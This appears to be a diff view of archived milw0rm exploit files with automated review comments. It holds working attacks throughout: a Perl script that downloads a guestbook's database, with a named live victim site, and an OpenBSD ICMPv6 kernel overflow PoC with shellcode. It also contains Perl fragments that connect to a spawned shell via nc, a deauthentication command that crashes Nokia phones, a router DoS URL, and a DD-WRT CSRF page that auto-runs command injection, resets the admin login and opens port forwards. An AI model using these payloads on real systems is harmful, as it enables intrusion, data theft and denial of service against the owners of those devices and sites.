@~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip @~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip
@~~=Demo :http://vegtrafikk.net @~~=Demo :http://vegtrafikk.net
@~~=======================================~~@ @~~=======================================~~@
@~~=Vul: @~~=Vul:
@~~=http://site.com/ [PATH] /admin_dl_browse.asp @~~=http://site.com/ [PATH] /admin_dl_browse.asp
@~~=http://site.com/ [PATH] /dl_add_form.asp @~~=http://site.com/ [PATH] /dl_add_form.asp
@~~=Demo: @~~=Demo:
@~~=http://vegtrafikk.net/admin_dl_browse.asp @~~=http://vegtrafikk.net/admin_dl_browse.asp
@~~=http://resala2u.com/admin_dl_browse.asp @~~=http://resala2u.com/admin_dl_browse.asp
vs.. vs.. vs.. vs.. vs.. vs..
@~~=======================================~~@ @~~=======================================~~@
@~~=Greetz For @~~=Greetz For
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang @~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@ @~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM... Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM... Onun derdini gordum, derdime iMRENDiM...
FilistiN FilistiN
@~~=======================================~~@ @~~=======================================~~@
# milw0rm.com [2009-02-27] # milw0rm.com [2009-02-27]
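Review bot: the "Vul:" section names two admin pages (admin_dl_browse.asp and dl_add_form.asp) but never states what the weakness is; the reader has to infer from the demo URLs that the admin pages are reachable without a login check. A one-line description of the issue (expected behaviour: redirect to login; observed: page served) and the affected version belong here, and the two live demo URLs should be replaced by placeholders in the archive rather than pointing at third-party sites.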

View file

@ -1,56 +1,56 @@
#!/usr/bin/perl #!/usr/bin/perl
# By AlpHaNiX [NullArea.Net] # By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz # alpha[at]hacker.bz
# Made in Tunisia # Made in Tunisia
########### ###########
# script : Exjune Guestbook v2 # script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp # download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
########### ###########
# Vulnerable : # Vulnerable :
# database path : /admin/exdb.mdb # database path : /admin/exdb.mdb
########## ##########
# Real Life Example : # Real Life Example :
# #
# #
# OOO OOO OO OO OO # OOO OOO OO OO OO
# OO O O O O # OO O O O O
# O O O OO OO O O O O OO OOO OOOO OOOOO # O O O OO OO O O O O OO OOO OOOO OOOOO
# O O O O O O O OOO OO OOOOOO O # O O O O O O O OOO OO OOOOOO O
# O OO O O O O O O O O OOOOOO # O OO O O O O O O O O OOOOOO
# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
# #
# #
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit #[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found & Exploited By AlpHaNiX #[-] Found & Exploited By AlpHaNiX
# #
# #
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// .... #[!] Exploiting http://www.ladyslipperretreat.com/guestbook// ....
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb #[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
########## ##########
# Greetz for Zigma/Djek/unary/r1z # Greetz for Zigma/Djek/unary/r1z
use lwp::UserAgent; use lwp::UserAgent;
system('cls'); system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit'); system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2'); system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();} if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n\n\n OOO OOO OO OO OO\n" ; print "\n\n\n\n OOO OOO OO OO OO\n" ;
print " OO O O O O\n" ; print " OO O O O O\n" ;
print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ; print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
print " O O O O O O O OOO OO OOOOOO O\n" ; print " O O O O O O O OOO OO OOOOOO O\n" ;
print " O OO O O O O O O O O OOOOOO\n" ; print " O OO O O O O O O O O OOOOOO\n" ;
print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ; print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n"; print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n";
print "[-] Found & Exploited By AlpHaNiX \n\n\n"; print "[-] Found & Exploited By AlpHaNiX \n\n\n";
print "[!] Exploiting $site ....\n"; print "[!] Exploiting $site ....\n";
my $site = $ARGV[0] ; my $site = $ARGV[0] ;
my $target = $site."/admin/exdb.mdb" ; my $target = $site."/admin/exdb.mdb" ;
my $useragent = LWP::UserAgent->new(); my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); my $request = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();} if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();}
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();} else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}
# milw0rm.com [2009-04-09] # milw0rm.com [2009-04-09]
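Review bot: the header gives the exposed file path (/admin/exdb.mdb) but no mitigation or detection note; for an archived advisory the fix (move the Access database outside the web root, or refuse to serve .mdb from the web server) and the log signature (GET requests for /admin/exdb.mdb) are what a defender needs. Style points: `use lwp::UserAgent;` is lowercase and fails on case-sensitive filesystems, and `system('cls')`, `title` and `color` are Windows-only commands under a `#!/usr/bin/perl` shebang, which the header should state; `$site` is also redeclared with `my $site = $ARGV[0] ;` after the normalised assignment above it, which is why the sample output shows "guestbook//".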

View file

@ -1,166 +1,166 @@
# The PoC executes the shellcode (int 3) and returns. It overwrites the # The PoC executes the shellcode (int 3) and returns. It overwrites the
# ext_free() function pointer on the mbuf and forces a m_freem() on the # ext_free() function pointer on the mbuf and forces a m_freem() on the
# overflowed packet. # overflowed packet.
# #
# The Impacket library is used to craft and send packets # The Impacket library is used to craft and send packets
# (http://oss.coresecurity.com/projects/impacket.html or download from # (http://oss.coresecurity.com/projects/impacket.html or download from
# Debian repositories) # Debian repositories)
# #
# Currently, only systems supporting raw sockets and the PF_PACKET family # Currently, only systems supporting raw sockets and the PF_PACKET family
# can run the included proof-of-concept code. # can run the included proof-of-concept code.
# #
# Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct # Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct
# 30" # 30"
# #
# To use the code to test a custom machine you will need to: 1) Adjust the # To use the code to test a custom machine you will need to: 1) Adjust the
# MACADDRESS variable 2) Find the right trampoline value for your system # MACADDRESS variable 2) Find the right trampoline value for your system
# and replace it in the code. To find a proper trampoline value use the # and replace it in the code. To find a proper trampoline value use the
# following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the # following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the
# ICMP checksum # ICMP checksum
# #
# The exploit should stop on an int 3 and pressing "c" in ddb the kernel # The exploit should stop on an int 3 and pressing "c" in ddb the kernel
# will continue normally. # will continue normally.
# #
# #
# Description: # Description:
# OpenBSD ICMPv6 fragment remote execution PoC # OpenBSD ICMPv6 fragment remote execution PoC
# #
# Author: # Author:
# Alfredo Ortega # Alfredo Ortega
# Mario Vilas # Mario Vilas
# #
# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc. # Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc.
# All rights reserved # All rights reserved
from impacket import ImpactPacket from impacket import ImpactPacket
import struct import struct
import socket import socket
import time import time
class BSD_ICMPv6_Remote_BO: class BSD_ICMPv6_Remote_BO:
MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f) MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f)
def Run(self): def Run(self):
self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
self.s.bind(('eth0',0x86dd)) self.s.bind(('eth0',0x86dd))
sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address
destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level
firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP) firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP)
validIcmp = self.buildValidICMPPacket(sourceIP,destIP) validIcmp = self.buildValidICMPPacket(sourceIP,destIP)
for i in range(100): # fill mbufs for i in range(100): # fill mbufs
self.sendpacket(firstFragment) self.sendpacket(firstFragment)
self.sendpacket(validIcmp) self.sendpacket(validIcmp)
time.sleep(0.01) time.sleep(0.01)
for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable
self.sendpacket(secondFragment) self.sendpacket(secondFragment)
time.sleep(0.1) time.sleep(0.1)
self.sendpacket(firstFragment) self.sendpacket(firstFragment)
self.sendpacket(validIcmp) self.sendpacket(validIcmp)
time.sleep(0.1) time.sleep(0.1)
def sendpacket(self, data): def sendpacket(self, data):
ipe = ImpactPacket.Ethernet() ipe = ImpactPacket.Ethernet()
ipe.set_ether_dhost(self.MACADDRESS) ipe.set_ether_dhost(self.MACADDRESS)
ipd = ImpactPacket.Data(data) ipd = ImpactPacket.Data(data)
ipd.ethertype = 0x86dd # Ethertype for IPv6 ipd.ethertype = 0x86dd # Ethertype for IPv6
ipe.contains(ipd) ipe.contains(ipd)
p = ipe.get_packet() p = ipe.get_packet()
self.s.send(p) self.s.send(p)
def buildOpenBSDPackets(self,sourceIP,destIP): def buildOpenBSDPackets(self,sourceIP,destIP):
HopByHopLenght= 1 HopByHopLenght= 1
IPv6FragmentationHeader = '' IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop) IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
IPv6HopByHopHeader = '' IPv6HopByHopHeader = ''
IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP) IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP)
IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D ) IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D )
IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options
longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader) longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader)
print longitud print longitud
IPv6Packet = '' IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x00' # next header (2c: Fragmentation) IPv6Packet += '\x00' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP IPv6Packet += sourceIP
IPv6Packet += destIP IPv6Packet += destIP
firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150) firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150)
self.ShellCode = '' self.ShellCode = ''
self.ShellCode += '\xcc' # int 3 self.ShellCode += '\xcc' # int 3
self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret
ICMPv6Packet = '' ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xfb\x4e' # checksum ICMPv6Packet += '\xfb\x4e' # checksum
ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode
# Start of the next mfub (we land here): # Start of the next mfub (we land here):
ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards
ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB' ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB'
# mbuf+0x20: # mbuf+0x20:
trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp") trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp")
ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG' ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG'
longitud = len(ICMPv6Packet) longitud = len(ICMPv6Packet)
IPv6Packet = '' IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x2c' # next header (2c: Fragmentation) IPv6Packet += '\x2c' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP IPv6Packet += sourceIP
IPv6Packet += destIP IPv6Packet += destIP
IPv6FragmentationHeader = '' IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6) IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet
return firstFragment, secondFragment return firstFragment, secondFragment
def buildValidICMPPacket(self,sourceIP,destIP): def buildValidICMPPacket(self,sourceIP,destIP):
ICMPv6Packet = '' ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xcb\xc4' # checksum ICMPv6Packet += '\xcb\xc4' # checksum
ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += 'T'*1232 ICMPv6Packet += 'T'*1232
longitud = len(ICMPv6Packet) longitud = len(ICMPv6Packet)
IPv6Packet = '' IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x3A' # next header (2c: Fragmentation) IPv6Packet += '\x3A' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP IPv6Packet += sourceIP
IPv6Packet += destIP IPv6Packet += destIP
icmpPacket = IPv6Packet+ICMPv6Packet icmpPacket = IPv6Packet+ICMPv6Packet
return icmpPacket return icmpPacket
attack = BSD_ICMPv6_Remote_BO() attack = BSD_ICMPv6_Remote_BO()
attack.Run() attack.Run()
# milw0rm.com [2007-03-15] # milw0rm.com [2007-03-15]
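Review bot: the next-header comments in buildOpenBSDPackets are shifted one header off from the values emitted: `struct.pack('!B', 0x3a) # next header (00: Hop by Hop)` writes 0x3a (ICMPv6), `struct.pack('!B', 0x2c) # next header (0x3A: ICMP)` writes 0x2c (Fragment), and `'\x00' # next header (2c: Fragmentation)` writes 0x00 (Hop-by-Hop); the same mislabel appears on `'\x3A' # next header (2c: Fragmentation)` in buildValidICMPPacket. The comments should name the value actually packed so the packet layout can be checked against the text. The header should also state that this is Python 2 only (`print longitud`, str-typed byte buffers) and that the checksums and trampoline are fixed values for the tested build, as the "Tested against" line implies.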

View file

@ -187,6 +187,6 @@ sub sendraw {
} else { } else {
die("can\'t connect... aborting.\n"); die("can\'t connect... aborting.\n");
} }
} }
# milw0rm.com [2000-11-15] # milw0rm.com [2000-11-15]

View file

@ -66,6 +66,6 @@ close(SOCKET);
print("\nSleeping 5 seconds - waiting for the shell ...\n\n"); print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0); sleep(5); system("nc -w 10 $target 60179"); exit(0);
# milw0rm.com [2000-11-17] # milw0rm.com [2000-11-17]

View file

@ -62,6 +62,6 @@ while ($ans = <$s>)
if ($flag == 1) { print " $ans"; } if ($flag == 1) { print " $ans"; }
if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 } if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
} }
# milw0rm.com [2005-04-08] # milw0rm.com [2005-04-08]

View file

@ -82,6 +82,6 @@ while (<$socket>)
print $_; print $_;
exit; exit;
} }
} }
# milw0rm.com [2005-04-08] # milw0rm.com [2005-04-08]

File diff suppressed because it is too large Load diff

View file

@ -1,29 +1,29 @@
Nokia E90 and probably other devices with s60v3 crashes with aireplay Nokia E90 and probably other devices with s60v3 crashes with aireplay
The device should be authorised on an access point The device should be authorised on an access point
sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0 sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0
My HW: My HW:
AP= Acorp w422g AP= Acorp w422g
Nokia E90 v 07.40.1.2 Ra-6 Nokia E90 v 07.40.1.2 Ra-6
For attack realisation is necessary to send DeAuth a package on the attacked For attack realisation is necessary to send DeAuth a package on the attacked
device (to throw out it from an access point), then to continue to send device (to throw out it from an access point), then to continue to send
packages on the device. packages on the device.
the Device is crashed off right after repeated authorisation on an access the Device is crashed off right after repeated authorisation on an access
point point
Vulnerability is fast shown at activity on WLAN Vulnerability is fast shown at activity on WLAN
WLAN Settings: auto WLAN Settings: auto
I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target
$iface $iface
Added: the vulnerable device: Nokia N82 Added: the vulnerable device: Nokia N82
# milw0rm.com [2008-09-14] # milw0rm.com [2008-09-14]
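Review bot: the write-up states the preconditions (device associated to the AP, deauth then continued frames) but describes the result only as "crashed off right after repeated authorisation"; it should say what was observed (reboot, hang, WLAN stack stopping) and whether the device recovers without user action, since that is what determines the impact rating. The phrase "I specify a harmful code" is a translation artefact for "the command used", and the second device (Nokia N82) appears as a trailing "Added:" line rather than in the hardware list above.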

View file

@ -1,17 +1,17 @@
LUNOSEC ADVISORY LUNOSEC ADVISORY
Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router
Firmware version tested: v1.2.2_14.0.13NA (LATEST) Firmware version tested: v1.2.2_14.0.13NA (LATEST)
Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested
Proof of Concept: Proof of Concept:
Appending a question mark to the router's internal IP address after Appending a question mark to the router's internal IP address after
the forward slash. e.g., http://192.168.1.1/? results in a denial of the forward slash. e.g., http://192.168.1.1/? results in a denial of
service condition where the http server dies and the administrative service condition where the http server dies and the administrative
interface is no longer available until after a device reboot. interface is no longer available until after a device reboot.
found: fabrizio siciliano (staticrez) found: fabrizio siciliano (staticrez)
# milw0rm.com [2009-02-25] # milw0rm.com [2009-02-25]
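Review bot: the second "Firmware version tested" line names a different model (WNR834Bv2) from the synopsis (WGR614v9), so affected models and their firmware versions should be listed separately instead of under one header. The advisory also records no vendor response and no mitigation beyond a reboot; for a reader of the archive, a note on whether later firmware fixes the crash, and that the issue is reachable only from the LAN side unless remote management is enabled, would complete it.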

View file

@ -1,93 +1,93 @@
Remote root dd-wrt Remote root dd-wrt
-------------------------------------------------------------------------------- --------------------------------------------------------------------------------
Written by Michael Brooks Written by Michael Brooks
Special thanks to str0ke Special thanks to str0ke
Exploits tested on the newist stable version: Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage: Product Homepage:
http://dd-wrt.com/ http://dd-wrt.com/
Impact: Impact:
1)Remote root command execuiton /bin/sh 1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration 2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT. 3)create new Port Forwarding rules to byass NAT.
<html> <html>
<head> <head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head> </head>
Remote root command execution /bin/sh Remote root command execution /bin/sh
<form method="post" action="http://192.168.1.1/apply.cgi" id=1> <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
<input name="submit_button" value="Ping" type="hidden"> <input name="submit_button" value="Ping" type="hidden">
<input name="action" value="ApplyTake" type="hidden"> <input name="action" value="ApplyTake" type="hidden">
<input name="submit_type" value="start" type="hidden"> <input name="submit_type" value="start" type="hidden">
<input name="change_action" value="gozila_cgi" type="hidden"> <input name="change_action" value="gozila_cgi" type="hidden">
<input name="next_page" value="Diagnostics.asp" type="hidden"> <input name="next_page" value="Diagnostics.asp" type="hidden">
<input name="ping_ip" value="echo owned"> <input name="ping_ip" value="echo owned">
<input name="execute command" type="submit"> <input name="execute command" type="submit">
</form><br><br> </form><br><br>
enable remote administration and change login to root:password enable remote administration and change login to root:password
<form method="post" action="http://192.168.1.1/apply.cgi"> <form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Management" type="hidden"> <input name="submit_button" value="Management" type="hidden">
<input name="action" value="ApplyTake" type="hidden"> <input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden"> <input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden"> <input name="submit_type" value="" type="hidden">
<input name="commit" value="1" type="hidden"> <input name="commit" value="1" type="hidden">
<input name="PasswdModify" value="0" type="hidden"> <input name="PasswdModify" value="0" type="hidden">
<input name="remote_mgt_https" value="" type="hidden"> <input name="remote_mgt_https" value="" type="hidden">
<input name="http_enable" value="1" type="hidden"> <input name="http_enable" value="1" type="hidden">
<input name="info_passwd" value="0" type="hidden"> <input name="info_passwd" value="0" type="hidden">
<input name="https_enable" value="" type="hidden"> <input name="https_enable" value="" type="hidden">
<input name="http_username" value="root" type="hidden"> <input name="http_username" value="root" type="hidden">
<input name="http_passwd" value="password" type="hidden"> <input name="http_passwd" value="password" type="hidden">
<input name="http_passwdConfirm" value="password" type="hidden"> <input name="http_passwdConfirm" value="password" type="hidden">
<input name="_http_enable" value="1" type="hidden"> <input name="_http_enable" value="1" type="hidden">
<input name="refresh_time" value="3" type="hidden"> <input name="refresh_time" value="3" type="hidden">
<input name="status_auth" value="1" type="hidden"> <input name="status_auth" value="1" type="hidden">
<input name="maskmac" value="1" type="hidden"> <input name="maskmac" value="1" type="hidden">
<input name="remote_management" value="1" type="hidden"> <input name="remote_management" value="1" type="hidden">
<input name="http_wanport" value="8080" type="hidden"> <input name="http_wanport" value="8080" type="hidden">
<input name="remote_mgt_telnet" value="1" type="hidden"> <input name="remote_mgt_telnet" value="1" type="hidden">
<input name="telnet_wanport" value="23" type="hidden"> <input name="telnet_wanport" value="23" type="hidden">
<input name="boot_wait" value="on" type="hidden"> <input name="boot_wait" value="on" type="hidden">
<input name="cron_enable" value="1" type="hidden"> <input name="cron_enable" value="1" type="hidden">
<input name="cron_jobs" value="" type="hidden"> <input name="cron_jobs" value="" type="hidden">
<input name="loopback_enable" value="1" type="hidden"> <input name="loopback_enable" value="1" type="hidden">
<input name="nas_enable" value="1" type="hidden"> <input name="nas_enable" value="1" type="hidden">
<input name="resetbutton_enable" value="1" type="hidden"> <input name="resetbutton_enable" value="1" type="hidden">
<input name="zebra_enable" value="1" type="hidden"> <input name="zebra_enable" value="1" type="hidden">
<input name="ip_conntrack_max" value="512" type="hidden"> <input name="ip_conntrack_max" value="512" type="hidden">
<input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden"> <input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
<input name="ip_conntrack_udp_timeouts" value="120" type="hidden"> <input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
<input name="overclocking" value="200" type="hidden"> <input name="overclocking" value="200" type="hidden">
<input name="router_style" value="yellow" type="hidden"> <input name="router_style" value="yellow" type="hidden">
<input name="Remote Admin" type="submit"> <input name="Remote Admin" type="submit">
</form><br><br> </form><br><br>
Change Port Forwarding to byass NAT protection. Change Port Forwarding to byass NAT protection.
<form method="post" action="http://192.168.1.1/apply.cgi"> <form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Change Port Forwarding" type="submit"> <input name="submit_button" value="Change Port Forwarding" type="submit">
<input name="action" value="ApplyTake" type="hidden"> <input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden"> <input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden"> <input name="submit_type" value="" type="hidden">
<input name="forward_spec" value="13" type="hidden"> <input name="forward_spec" value="13" type="hidden">
<input name="name0" value="Hacked" type="hidden"> <input name="name0" value="Hacked" type="hidden">
<input name="from0" value="4450" type="hidden"> <input name="from0" value="4450" type="hidden">
<input name="pro0" value="both" type="hidden"> <input name="pro0" value="both" type="hidden">
<input name="ip0" value="192.168.1.100" type="hidden"> <input name="ip0" value="192.168.1.100" type="hidden">
<input name="to0" value="445" type="hidden"> <input name="to0" value="445" type="hidden">
<input name="enable0" value="on" type="hidden"> <input name="enable0" value="on" type="hidden">
<input name="name1" value="Hacked Again" type="hidden"> <input name="name1" value="Hacked Again" type="hidden">
<input name="from1" value="22" type="hidden"> <input name="from1" value="22" type="hidden">
<input name="pro1" value="tcp" type="hidden"> <input name="pro1" value="tcp" type="hidden">
<input name="ip1" value="192.168.1.101" type="hidden"> <input name="ip1" value="192.168.1.101" type="hidden">
<input name="to1" value="22" type="hidden"> <input name="to1" value="22" type="hidden">
<input name="enable1" value="on" type="hidden"> <input name="enable1" value="on" type="hidden">
</form> </form>
</html> </html>
<script> <script>
document.getElementById(1).submit();//remote root command execution! document.getElementById(1).submit();//remote root command execution!
</script> </script>
# milw0rm.com [2008-12-08] # milw0rm.com [2008-12-08]
